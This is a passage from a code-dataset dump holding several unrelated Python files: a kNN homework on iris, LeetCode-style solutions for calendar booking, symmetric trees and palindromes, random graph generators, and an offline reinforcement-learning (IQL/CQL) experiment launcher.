script.run()\n","repo_name":"Darxeal/airshow-simulator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11317296497","text":"from sklearn import neighbors, datasets\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import train_test_split\n\nfrom sklearn.decomposition import PCA\nimport numpy as np\nfrom lib3 import plot\nfrom lib3 import *\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\nfrom tabulate import tabulate\n\nprint(\"ML - Homework3 - Marco Treglia\\n\")\ncolors = plt.cm.cool\n\n# 
1\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\n# 2\nX = preprocessing.scale(X)\npca = PCA(n_components=2)\nX_t = pca.fit_transform(X)\n\n# 3\nX_train, X_test, y_train, y_test = train_test_split(\n X_t, y, test_size=0.40, random_state=100)\n\n\n# 4\naccuracy_list = []\nplt.figure(figsize=(12, 9))\nfor k in range(1, 11):\n title = \"(k= \" + str(k) + \")\"\n print(title)\n clf = neighbors.KNeighborsClassifier(n_neighbors=k)\n clf.fit(X_train, y_train)\n\n plt.subplot(3, 4, k)\n res = 0.01\n plt.title(title)\n plt.grid(True)\n y_min, y_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\n x_min, x_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, res), np.arange(y_min, y_max, res))\n Z = clf.predict(np.array([xx.ravel(), yy.ravel()]).T)\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, alpha=0.2, color=colors)\n plt.scatter(X_test[:, 0], X_test[:, 1], c=clf.predict(X_test), cmap=colors)\n\n accuracy_list.append([k, clf.score(X_test, y_test) * 100])\n\nplt.savefig(\"../plot/\" + title + \".png\", dpi=100)\nplt.show()\nprint(accuracy_list)\n\n\naccuracy_list = np.asarray(accuracy_list)\nplt.title(\"Accuracy K 1 to 10\")\nplt.xlabel(\"K\")\nplt.plot(accuracy_list[:, 0], accuracy_list[:, 1], c='blue')\nplt.savefig(\"../plot/\" + \"accuracy\" + \".png\", dpi=100)\nplt.show()\n\n\n# 6\naccuracy_list = []\ntitle = \"\\n3-Class classification (k= 3 weights = uniform)\"\nclf = neighbors.KNeighborsClassifier(n_neighbors=3, weights='uniform')\nclf.fit(X_train, y_train)\nplot(X, X_test, X_train, clf, title)\naccuracy_list.append(['Uniform', clf.score(X_test, y_test)])\n\ntitle = \"\\n3-Class classification (k= 3 weights = distance)\"\nclf = neighbors.KNeighborsClassifier(n_neighbors=3, weights='distance')\nclf.fit(X_train, y_train)\nplot(X, X_test, X_train, clf, title)\naccuracy_list.append(['Distance', clf.score(X_test, y_test)])\nprint(accuracy_list)\n\n\n# Plotting the gaus Fuction\nfunctions = [my_func, my_func1, my_func2, my_func3]\ncolor = ['red', 'blue', 'green', 'black']\nlabel = ['alfa=0.1', 'alfa=10', 'alfa=100', 'alfa=1000']\nx = np.linspace(0, 10, 50)\ninfo1 = []\ninfo1.append(['weight', 'distance'])\ninfo2 = []\ninfo2.append(['weight', 'distance'])\ninfo3 = []\ninfo3.append(['weight', 'distance'])\ninfo4 = []\ninfo4.append(['weight', 'distance'])\n\ninfo_list = [info1, info2, info3, info4]\n\nfor j in range(4):\n y = []\n for i in range(len(x)):\n y.append(functions[j](x[i]))\n info_list[j].append([j, x[i], functions[j](x[i])])\n\n plt.plot(x, np.asarray(y), c=color[j], label=label[j])\n # print(tabulate(info_list[j]))\n plt.legend()\n plt.savefig(\"../plot/\" + \"gauss\" + \".png\", dpi=200)\n plt.show()\n\n\n#7 - 8\naccuracy_list = []\nfunc_title = [\"my_fuction, alfa=0.1\", \"my_fuction, alfa=10\",\n \"my_fuction, alfa=100\", \"my_fuction, alfa=1000\"]\nplt.figure(figsize=(12, 10))\n\nfor k in range(len(functions)):\n title = \"(k= 3, weights = \" + func_title[k] + \" )\"\n clf = neighbors.KNeighborsClassifier(n_neighbors=10, weights=functions[k])\n clf.fit(X_train, y_train)\n res = 0.01\n\n plt.subplot(2, 2, k + 1)\n plt.title(title)\n plt.grid(True)\n\n x_min, x_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\n y_min, y_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\n\n xx, yy = np.meshgrid(np.arange(x_min, x_max, res), np.arange(y_min, y_max, res))\n Z = clf.predict(np.array([xx.ravel(), yy.ravel()]).T)\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, alpha=0.2, color=colors)\n 
plt.scatter(X_test[:, 0], X_test[:, 1], c=clf.predict(X_test), cmap=colors)\n accuracy_list.append([k, clf.score(X_test, y_test)])\n\nplt.savefig(\"../plot/\" + title + \".png\", dpi=100)\nplt.show()\n\nprint(tabulate(accuracy_list))\naccuracy_list = np.asarray(accuracy_list)\nplt.title(\"Accuracy incrementing alfa from 0.1 to 1000\")\nplt.plot(accuracy_list[:, 0] + 1, accuracy_list[:, 1], c='blue')\nplt.savefig(\"../plot/\" + \"accuracyMyFunc\" + \".png\", dpi=100)\nplt.show()\n\n\nprint(\"Accuracy : \" + str(clf.score(X_test, y_test)) + \". \\n\")\n\n# 10\n\nparam_grid = {'n_neighbors': np.arange(1, 11),\n 'weights': ['uniform', 'distance', my_func, my_func1, my_func2, my_func3],\n 'metric': ['euclidean', 'manhattan']\n }\n\nKN = neighbors.KNeighborsClassifier()\nclf_grid = GridSearchCV(KN, param_grid)\nclf_grid.fit(X_train, y_train)\npredict = clf_grid.predict(X_test)\nacc = clf_grid.best_estimator_.score(X_test, y_test)\n\nplot(X, X_test, X_train, clf_grid.best_estimator_, \"Best Estimator\")\n\nprint(\"Accuracy = \" + str(acc))\n\naccuracy_table = []\nn_neigh = np.arange(1, 11)\nweight = ['uniform', 'distance', my_func, my_func1, my_func2, my_func3]\nmetrics = ['euclidean', 'manhattan']\naccuracy_table.append([\"METRIC\", \"WEIGHT\", \"N-NEIGHT\", \"ACCURACY\"])\n\nfor i in range(len(metrics)):\n for j in range(len(weight)):\n for k in range(len(n_neigh)):\n title = \"KN - Metric : {} | Weight : {} | N_neightbors : {} \".format(\n metrics[i], weight[j], n_neigh[k])\n clf = neighbors.KNeighborsClassifier(\n n_neighbors=n_neigh[k], weights=weight[j], metric=metrics[i])\n clf.fit(X_train, y_train)\n accuracy = clf.score(X_test, y_test)\n accuracy_table.append([metrics[i], weight[j], n_neigh[k], accuracy])\n\n# print(tabulate(accuracy_table, tablefmt='latex', floatfmt='.2f'))\n\ntitle = \"KN - Metric : manhattan | Weight : my_func | N_neightbors : 9 \"\nclf = neighbors.KNeighborsClassifier(n_neighbors=9, weights=my_func, metric='manhattan')\nclf.fit(X_train, y_train)\nprint(clf.score(X_test, y_test))\nplot(X, X_test, X_train, clf, title)\n","repo_name":"MarkNo1/Machine_Learning","sub_path":"ML_16-17/03-Nearest_Neighbours/code/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40774679405","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-05-07 08:00:00\n# @Last Modified : 2020-05-07 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 实现一个 MyCalendar 类来存放你的日程安排。如果要添加的时间内没有其他安排,则可以存储这个新的日程安排。 \n# \n# MyCalendar 有一个 book(int start, int end)方法。它意味着在 start 到 end 时间内增加一个日程安排,注意,这里\n# 的时间是半开区间,即 [start, end), 实数 x 的范围为, start <= x < end。 \n# \n# 当两个日程安排有一些时间上的交叉时(例如两个日程安排都在同一时间内),就会产生重复预订。 \n# \n# 每次调用 MyCalendar.book方法时,如果可以将日程安排成功添加到日历中而不会导致重复预订,返回 true。否则,返回 false 并且不要将该\n# 日程安排添加到日历中。 \n# \n# 请按照以下步骤调用 MyCalendar 类: MyCalendar cal = new MyCalendar(); MyCalendar.book(st\n# art, end) \n# \n# 示例 1: \n# \n# MyCalendar();\n# MyCalendar.book(10, 20); // returns true\n# MyCalendar.book(15, 25); // returns false\n# MyCalendar.book(20, 30); // returns true\n# 解释: \n# 第一个日程安排可以添加到日历中. 
第二个日程安排不能添加到日历中,因为时间 15 已经被第一个日程安排预定了。\n# 第三个日程安排可以添加到日历中,因为第一个日程安排并不包含时间 20 。\n# \n# \n# 说明: \n# \n# \n# 每个测试用例,调用 MyCalendar.book 函数最多不超过 100次。 \n# 调用函数 MyCalendar.book(start, end)时, start 和 end 的取值范围为 [0, 10^9]。 \n# \n# Related Topics 数组\n\n\"\"\"\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nclass BSTNode(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n self.left = None\n self.right = None\n\n def insert(self, node):\n if node.start >= self.end:\n if not self.right:\n self.right = node\n return True\n return self.right.insert(node)\n elif node.end <= self.start:\n if not self.left:\n self.left = node\n return True\n return self.left.insert(node)\n else:\n return False\n\n\nclass MyCalendar:\n \"\"\"\n 二叉搜索树\n GOOD\n \"\"\"\n\n def __init__(self):\n self.root = None\n\n def book(self, start: int, end: int) -> bool:\n if self.root is None:\n self.root = BSTNode(start, end)\n return True\n return self.root.insert(BSTNode(start, end))\n\n\n# Your MyCalendar object will be instantiated and called as such:\n# obj = MyCalendar()\n# param_1 = obj.book(start,end)\n# leetcode submit region end(Prohibit modification and deletion)\n\ndef test_design():\n obj = MyCalendar()\n assert obj.book(10, 20) # returns true\n assert obj.book(15, 25) is False # returns false\n assert obj.book(20, 30) # returns true\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0729_my-calendar-i.py","file_name":"0729_my-calendar-i.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71349947012","text":"from Graphs import *\n\nfrom itertools import combinations\nfrom random import choice\nfrom sys import modules\nfrom functools import partial\n\nfrom numpy.random import multinomial, uniform\nfrom numpy import zeros\n\n\ndef ErdosRenyiGraph(n, p=0.05):\n\t\"\"\"Each possible edge is included with probability p.\"\"\"\n\tnodes = range(n)\n\tedges = filter(lambda x: uniform(0,1) < p, combinations(nodes, 2))\n\treturn UndirectedGraph(nodes, edges)\n\n\ndef BarabasiAlbertGraph(n, d):\n\t\"\"\"Preferential atachment graph on n nodes; most nodes have degree >= d.\"\"\"\n\tnodes = range(n)\n\tedges = set()\n\tdegrees = zeros(n)\n\tfor node in nodes:\n\t\tdegrees[node] += 1\n\t\tnew_edges = set()\n\t\twhile degrees[node] <= d and degrees[node] <= node:\n\t\t\tneighbor = list(multinomial(1, degrees / degrees.sum())).index(1)\n\t\t\te = (node, neighbor)\n\t\t\tif e in new_edges:\n\t\t\t\tcontinue\n\t\t\tnew_edges.add(e)\n\t\t\tdegrees[neighbor] += 1\n\t\t\tdegrees[node] += 1\n\t\tedges.update(new_edges)\n\treturn UndirectedGraph(nodes, edges)\n\n\ndef UniformSpanningTree(n):\n\t\"\"\"Uniform spanning tree over the complete graph on n edges.\"\"\"\n\tnew_nodes = range(n)\n\ttree_nodes = set()\n\tedges = set()\n\tfirst_node = new_nodes.pop(choice(new_nodes))\n\ttree_nodes.add(first_node)\n\twhile len(tree_nodes) < n:\n\t\tsrc_node = choice(new_nodes)\n\t\tpath = [src_node]\n\t\twhile src_node in new_nodes:\n\t\t\ttree_nodes.add(src_node)\n\t\t\tnew_nodes.pop(new_nodes.index(src_node))\n\t\t\tdst_node = choice(range(n))\n\t\t\twhile dst_node in path:\n\t\t\t\tdst_node = choice(range(n))\n\t\t\tedges.add(Edge(src_node, dst_node))\n\t\t\tpath.append(dst_node)\n\t\t\tsrc_node = dst_node\n\tGraph.__init__(self, tree_nodes, edges)\n\n\ndef 
ERGd(n, d):\n\treturn ErdosRenyiGraph(n, float(d)/n)\n\nfor i in range(1,11):\n\tsetattr(modules[__name__], 'ERGd'+str(i), partial(ERGd, d=i))\n\n\ndef BAGd(n, d):\n\treturn BarabasiAlbertGraph(n, (d+1)/2)\n\nfor i in range(2,11):\n\tsetattr(modules[__name__], 'BAGd'+str(i), partial(BAGd, d=i))\n\n\ndef WattsStrogatzGraph(n, k=4, p=0.1):\n\t\"\"\"\n\tLocal connections on a ring lattice with random re-wirings.\n\t\n\tParameters:\n\tk = number of lattice neighbors each node begins with local connections to.\n\tp = probability that each local connection gets re-wired to a new uniformly\n\t\tchosen endpoint.\n\t\"\"\"\n\tnodes = range(n)\n\tlocal_edges = []\n\tfor i in range(1,k/2+1):\n\t\tlocal_edges.extend(zip(nodes, range(i,n) + range(i)))\n\tg = UndirectedGraph(nodes, local_edges)\n\tfor e in local_edges:\n\t\tif uniform() < p:\n\t\t\tg.addEdge(e[0], choice(list(g.nodes - g.edges[e[0]] - {e[0]})))\n\t\t\tg.removeEdge(*e)\n\treturn g\n\n\ndef BalancedBinaryTree(n):\n\treturn UndirectedGraph(range(n), [(i, (i-1)/2) for i in range(1,n)])\n\n\ndef LineGraph(n):\n\treturn UndirectedGraph(range(n), [(i, i+1) for i in range(n-1)])\n\n\ndef RingGraph(n):\n\treturn UndirectedGraph(range(n), [(i, i+1) for i in range(n-1)] + [(n-1,0)])\n\n\ndef EmptyGraph(n):\n\treturn UndirectedGraph(range(n))\n\n\ndef CompleteGraph(n):\n\treturn UndirectedGraph(range(n), combinations(range(n), 2))\n\n\ndef RandomEdgeDirections(graph):\n\tedges = []\n\tfor src, dst in set(map(lambda e: tuple(sorted(e)), graph.allEdges())):\n\t\tif uniform(0,1) < 0.5:\n\t\t\tedges.append((src, dst))\n\t\telse:\n\t\t\tedges.append((dst, src))\n\treturn DirectedGraph(graph.nodes, edges)\n\n\ndef AddWeights(graph):\n\tedges = [(e[0], e[1], 1) for e in graph.allEdges()]\n\treturn WeightedDirectedGraph(graph.nodes, edges)\n\n\n","repo_name":"egtaonline/CredNets","sub_path":"Graphs/GraphGenerators.py","file_name":"GraphGenerators.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9611766471","text":"# https://practice.geeksforgeeks.org/viewSol.php?subId=ff3cb0365cc0e5a1c8ec957014bcaa14&pid=700583&user=darsisriguruaakash\n# https://www.youtube.com/watch?v=nKggNAiEpBE\n# https://www.techiedelight.com/check-given-binary-tree-symmetric-structure-not/\nclass Solution:\n # return true/false denoting whether the tree is Symmetric or not\n def symmetric(self,l,r):\n if l is None and r is None:\n return True \n elif l is None or r is None:\n return False\n if l.data != r.data:\n return False\n else:\n ans1 = self.symmetric(l.right,r.left)\n ans2 = self.symmetric(l.left,r.right)\n return ans1 and ans2\n def isSymmetric(self, root):\n # Your Code Here\n \n if root is None:\n return True \n return self.symmetric(root.left,root.right)\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#Contributed by Sudarshan Sharma\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i<len(ip)):\n # Get and remove the front of the queue\n 
currNode=q[0]\n q.popleft()\n size=size-1\n \n # Get the current node's value from the string\n currVal=ip[i]\n \n # If the left child is not null\n if(currVal!=\"N\"):\n \n # Create the left child for the current node\n currNode.left=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.left)\n size=size+1\n # For the right child\n i=i+1\n if(i>=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return root\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n ob = Solution()\n if ob.isSymmetric(root):\n print(\"True\")\n else:\n print(\"False\")\n \n \n\n# } Driver Code Ends","repo_name":"Aakashdarsi/Algorithms-All-Sets","sub_path":"DSA-Python/Trees/is_symmetric.py","file_name":"is_symmetric.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24233621843","text":"# https://leetcode.cn/problems/valid-palindrome/\nclass Solution:\n\n def isPalindrome(self, s: str) -> bool:\n if len(s) < 1:\n return True\n # print(s.lower())\n s = s.lower()\n left, right = 0, len(s) - 1\n while left < right:\n while s[left] < '0' or '9' < s[left] < 'a' or s[left] > 'z':\n left += 1\n if left > len(s) - 1:\n return True\n while s[right] < '0' or '9' < s[right] < 'a' or s[right] > 'z':\n right -= 1\n if right < 0:\n return True\n if left >= right:\n break\n if s[left] != s[right]:\n return False\n left += 1\n right -= 1\n return True\n\n\nif __name__ == '__main__':\n a = Solution()\n s = \"race a car\"\n print(a.isPalindrome(s))\n","repo_name":"NIAN-QIAO/2023SPRING","sub_path":"String/Palindromic string/125isPalindrome.py","file_name":"125isPalindrome.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42874711212","text":"\"\"\"\nAWR + SAC from demo experiment\n\"\"\"\n\n# from multiworld.core.image_env import normalize_image\nfrom numpy.core.fromnumeric import transpose\nfrom torch.nn.functional import normalize\nfrom rlkit.demos.source.hdf5_path_loader import HDF5PathLoader\nfrom rlkit.launchers.experiments.awac.finetune_rl import experiment\n\nfrom rlkit.launchers.launcher_util import run_experiment\n\nfrom rlkit.torch.sac.policies import GaussianPolicy, TanhGaussianPolicy\nfrom rlkit.torch.sac.iql_trainer import IQLTrainer\nfrom rlkit.torch.sac.cql_trainer import CQLTrainer\n\n\nimport random\nimport time\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str)\nparser.add_argument('--env_name', type=str, default='halfcheetah-medium-v2')\nparser.add_argument('--algo_type', type=str, default='iql')\nparser.add_argument('--image_rl', action='store_true')\nparser.add_argument('--no_curl_contrastive_learning', action='store_true')\n\nparser.add_argument('--seperate_vf_encoder', action='store_true')\nparser.add_argument('--pretrain_contrastive', action='store_true')\n\nparser.add_argument('--data_mix_type', type=str, default=None)\nparser.add_argument('--data_mix_num_real', type=int, default=None)\nparser.add_argument('--data_mix_num_gen', type=int, default=None)\nparser.add_argument('--add_sac_entropy', action='store_true')\n\nparser.add_argument('--slac_representation', 
action='store_true')\nparser.add_argument('--freeze_slac', action='store_true')\nparser.add_argument('--slac_latent_model_load_dir', type=str, default='')\nparser.add_argument('--slac_buffer_load_dir', type=str, default=None)\nparser.add_argument('--slac_policy_input_type', type=str, default=None)\nparser.add_argument('--slac_obs_reset_w_same_obs', action='store_true')\n\nparser.add_argument('--uncertainty_penalty_lambda', type=float, default=1.0)\nparser.add_argument('--uncertainty_type', type=str, default=None)\nparser.add_argument('--uncertainty_ablation', action='store_true')\nparser.add_argument('--generalization_test', type=str, default=None)\n\nparser.add_argument('--n_experiments', type=int, default=1)\nparser.add_argument('--gpu_id', type=int, default=0)\nparser.add_argument('--gpu_list', nargs=\"+\", default=[0,1,2])\nparser.add_argument('--seperate_buffer', action='store_true')\nparser.add_argument('--use_advanced_data', action='store_true')\nparser.add_argument('--use_tiny_data', action='store_true')\n\n\nparser.add_argument('--rad_aug', action='store_true')\nparser.add_argument('--rad_aug_type', type=str, default=None)\n\nparser.add_argument('--debug', action='store_true')\n\n\nargs = parser.parse_args()\n\nimage_rl = args.image_rl\n\nfrom_pixels = False\nvisualize_reward = False # prevent green colorizing when render\ndm_control_env_dict = { \n 'cheetah-run-mixed_first_500k' : dict(domain_name='cheetah', task_name='run', frame_skip=4, from_pixels = from_pixels, visualize_reward = visualize_reward), \n \n }\nis_dmc = True if args.env_name in dm_control_env_dict.keys() else False\n\nif args.slac_representation:\n assert args.no_curl_contrastive_learning\nelif args.no_curl_contrastive_learning:\n assert not args.slac_representation\n\nif is_dmc:\n max_path_length = int(1000/(dm_control_env_dict.get(args.env_name).get('frame_skip')))\n\n\nimport os\n\nsave_path = './data' \nslac_latent_model_path = './slac_pytorch/logs'\n\n\ntrainer_class_dict = {'iql' : IQLTrainer, 'cql' : CQLTrainer}\ntrainer_kwargs_dict = {'iql' : dict(discount=0.99,\n policy_lr=1E-4,\n qf_lr=3E-4,\n reward_scale=1,\n soft_target_tau=0.005,\n policy_weight_decay=0,\n q_weight_decay=0,\n reward_transform_kwargs=None,\n terminal_transform_kwargs=None,\n beta=1.0/10, \n quantile=0.7, \n clip_score=100,\n image_rl = args.image_rl, \n policy_update_period=1,\n q_update_period=1,\n curl_update_period =1,\n target_update_period = 2,\n encoder_target_tau = 0.025,\n no_curl_contrastive_learning = args.no_curl_contrastive_learning,\n pretrain_contrastive = args.pretrain_contrastive,\n add_sac_entropy = args.add_sac_entropy,\n training_start_steps = 0, \n # SLAC\n slac_representation = args.slac_representation, \n freeze_slac = args.freeze_slac,\n slac_update_period = 1,\n slac_policy_input_type = args.slac_policy_input_type,\n \n ),\n 'cql' : dict(discount=0.99,\n soft_target_tau=5e-3,\n policy_lr=1E-4,\n qf_lr=3E-4,\n reward_scale=1,\n use_automatic_entropy_tuning=True,\n\n # Target nets/ policy vs Q-function update\n policy_eval_start=40000,\n num_qs=2,\n\n # min Q\n temp=1.0,\n min_q_version=3,\n min_q_weight=5.0,\n\n # lagrange\n with_lagrange=False,\n lagrange_thresh=-1.0,\n \n # extra params\n num_random=10,\n max_q_backup=False,\n deterministic_backup=False,\n \n image_rl = args.image_rl, \n encoder_lr = 1e-3, \n \n curl_update_period = 1,\n encoder_target_tau = 0.05,\n no_curl_contrastive_learning = args.no_curl_contrastive_learning,\n training_start_steps = 0,\n pretrain_contrastive = 
args.pretrain_contrastive,\n # for SLAC\n slac_representation = args.slac_representation, \n freeze_slac = args.freeze_slac,\n slac_update_period = 1,\n slac_policy_input_type = args.slac_policy_input_type,\n ),\n \n }\ntrainer_class=trainer_class_dict[args.algo_type]\ntrainer_kwargs = trainer_kwargs_dict[args.algo_type]\nif args.slac_representation:\n offline_image_data_path_prefix = save_path+'/trajwise'\n\n\nif not image_rl: \n if is_dmc: \n env_kwargs = dm_control_env_dict.get(args.env_name)\n\n variant = dict(\n algo_kwargs=dict(\n start_epoch=-1000, # offline epochs\n num_epochs=1001, # online epochs\n batch_size=256,\n num_eval_steps_per_epoch=10*max_path_length if not args.debug else 100,\n num_trains_per_train_loop=1000 if not args.debug else 100,\n num_expl_steps_per_train_loop=1000 if not args.debug else 100,\n min_num_steps_before_training=1000 if not args.debug else 100,\n ),\n max_path_length=max_path_length,\n video_eval_max_path_length=max_path_length,\n video_expl_max_path_length=1000,\n replay_buffer_size=int(2E6),\n layer_size=256,\n policy_class=TanhGaussianPolicy,\n policy_kwargs=dict(\n hidden_sizes=[256, 256, ],\n ),\n qf_kwargs=dict(\n hidden_sizes=[256, 256, ],\n ),\n \n algorithm=\"SAC\",\n version=\"normal\",\n collection_mode='batch',\n trainer_class=trainer_class,\n trainer_kwargs=trainer_kwargs,\n \n algo_type = args.algo_type,\n offline_image_data_path_prefix = offline_image_data_path_prefix,\n\n launcher_config=dict(\n num_exps_per_instance=1,\n region='us-west-2',\n ),\n\n path_loader_class=HDF5PathLoader,\n path_loader_kwargs=dict(),\n add_env_demos=False,\n add_env_offpolicy_data=False,\n\n load_demos=False,\n load_env_dataset_demos=True,\n\n normalize_env=False,\n env_id=args.env_name, #'halfcheetah-medium-v2',\n normalize_rewards_by_return_range=True,\n\n seed=random.randint(0, 100000),\n \n is_dmc = is_dmc,\n image_rl = False,\n \n state_rl_100k_debug = False,\n # frame_stack = 3,\n use_tiny_data = args.use_tiny_data,\n save_video = True, #False,\n env_kwargs = env_kwargs,\n \n )\n\nelse: # image rl\n from examples.iql.custom_networks import TanhGaussianPolicyWithEncoder \n '''\n epoch *num_trains_per_train_loop = total gradient steps (you should consider network update period)\n '''\n \n if is_dmc:\n if args.slac_representation:\n env_kwargs = dm_control_env_dict.get(args.env_name)\n env_kwargs.update({'from_pixels' : True, 'width' : 100, 'height' : 100})\n if args.generalization_test:\n if 'walker' in args.env_name:\n env_kwargs.update({'task_name' : 'run'})\n else:\n env_kwargs = dm_control_env_dict.get(args.env_name) \n \n \n \n if (args.algo_type in ['cql', 'bear']) and (not args.slac_representation):\n batch_size = 128\n else:\n batch_size = 128\n\n\n\n variant = dict(\n algo_kwargs=dict(\n start_epoch=-150 if not args.debug else -1, # offline epochs\n num_epochs=151 if not args.debug else 1, # online epochs\n batch_size=batch_size,\n num_eval_steps_per_epoch=10*max_path_length if not args.debug else 125, \n num_trains_per_train_loop=2000 if not args.debug else 10,\n num_expl_steps_per_train_loop=2000 if not args.debug else 125, \n min_num_steps_before_training=1000 if not args.debug else 125,\n num_pretrains = 10000 if args.pretrain_contrastive else 0, \n slac_representation = args.slac_representation,\n rad_aug = args.rad_aug,\n ),\n max_path_length=max_path_length,\n video_eval_max_path_length=max_path_length,\n video_expl_max_path_length=1000,\n replay_buffer_size=int(1E6), # No meaning\n image_replay_buffer_size = int(1E5) if 
args.data_mix_type is None else int(args.data_mix_num_real+args.data_mix_num_gen), # 100k\n layer_size=256,\n policy_class=TanhGaussianPolicyWithEncoder,\n policy_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n \n ),\n qf_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n ),\n vf_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n ),\n \n algorithm=\"SAC\",\n version=\"normal\",\n collection_mode='batch',\n trainer_class=trainer_class,\n trainer_kwargs=trainer_kwargs,\n launcher_config=dict(\n num_exps_per_instance=1,\n region='us-west-2',\n ),\n\n path_loader_class=HDF5PathLoader,\n path_loader_kwargs=dict(),\n add_env_demos=False,\n add_env_offpolicy_data=False,\n\n load_demos=False,\n load_env_dataset_demos=True,\n\n normalize_env=False,\n env_id=args.env_name,\n normalize_rewards_by_return_range=True if not is_dmc else False,\n\n seed=random.randint(0, 100000),\n \n use_tiny_data = args.use_tiny_data,\n generalization_test = args.generalization_test,\n use_advanced_data = args.use_advanced_data,\n seperate_buffer = args.seperate_buffer,\n uncertainty_penalty_lambda = args.uncertainty_penalty_lambda,\n uncertainty_type = args.uncertainty_type,\n slac_representation = args.slac_representation,\n slac_latent_model_load_dir = slac_latent_model_path + args.slac_latent_model_load_dir,\n slac_buffer_load_dir = args.slac_buffer_load_dir, \n slac_policy_input_type = args.slac_policy_input_type,\n slac_obs_reset_w_same_obs = args.slac_obs_reset_w_same_obs,\n \n \n slac_algo_kwargs = dict(buffer_size = int(1.05e5),\n image_size = 100,\n feature_dim = 256,\n z1_dim = 32,\n z2_dim = 256,\n ),\n # for RAD\n rad_aug = args.rad_aug,\n rad_aug_type = args.rad_aug_type, \n\n algo_type = args.algo_type,\n memory_efficient_way = True,\n \n data_mix_type = args.data_mix_type,\n data_mix_num_real = args.data_mix_num_real,\n data_mix_num_gen = args.data_mix_num_gen,\n seperate_vf_encoder = args.seperate_vf_encoder,\n \n env_kwargs = env_kwargs,\n offline_image_data_path_prefix = offline_image_data_path_prefix,\n frame_stack = 3,\n image_rl = True,\n is_dmc = is_dmc,\n image_obs_shape = (3*3,100,100), # (C*frame stack, H,W)\n \n curl_learning = False if args.slac_representation else True, \n curl_crop_image_size = 84,\n \n save_video = True,\n \n )\n\n\ndef main():\n if is_dmc:\n from xvfbwrapper import Xvfb\n vdisplay = Xvfb()\n vdisplay.start()\n print('xvfb started!')\n\n is_multiprocess = False\n if args.n_experiments > 1:\n print('Currently {} multiprocess is used!'.format(args.n_experiments))\n is_multiprocess = True\n from multiprocessing import Process\n\n if is_multiprocess: \n processes = [] \n for idx, e in enumerate(range(args.n_experiments)): \n gpu_id = args.gpu_list[idx]\n # gpu_id = idx\n print('gpu id : ', gpu_id)\n seed=random.randint(0, 100000)\n variant['seed'] = seed\n def train_func():\n run_experiment(experiment,\n variant=variant,\n exp_prefix= args.algo_type+'-'+ args.env_name+'-' + args.exp_name,\n mode=\"here_no_doodad\",\n unpack_variant=False,\n use_gpu=True, \n gpu_id = gpu_id,\n snapshot_mode = 'all',\n ) \n # Awkward hacky process runs, because Tensorflow does not like\n # repeatedly calling train_AC in the same thread.\n \n p = Process(target=train_func, args=tuple())\n p.start()\n processes.append(p)\n \n # if you comment in the line below, then the loop will block\n # until this process finishes\n # p.join()\n time.sleep(10) # waiting for h5py load time!\n \n for p in processes:\n p.join()\n \n\n else: \n base_log_dir = save_path+'/OfflineRL/state' if not args.image_rl else 
